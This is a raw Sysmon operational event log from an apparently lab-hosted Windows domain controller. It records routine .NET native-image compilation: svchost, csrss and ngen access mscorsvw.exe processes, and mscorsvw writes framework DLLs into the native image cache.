13:51:28.084{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-7E04-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.069{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-7E04-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.069{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-7E04-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.959{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.959{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.959{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8704-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.772{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8704-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.772{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8704-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:29.709{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\560-0\System.Web.Extensions.Design.dll2021-01-18 13:51:29.709 10341000x80000000000000008785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.272{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.256{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.256{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.163{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8504-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.147{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8504-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.147{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8504-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.053{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8404-00000000A301}1408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.038{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8404-00000000A301}1408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.038{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8404-00000000A301}1408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:30.928{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1088-0\System.Web.Mobile.dll2021-01-18 13:51:30.928 10341000x80000000000000008813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.928{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.912{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.912{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.475{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8D04-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.459{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8D04-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 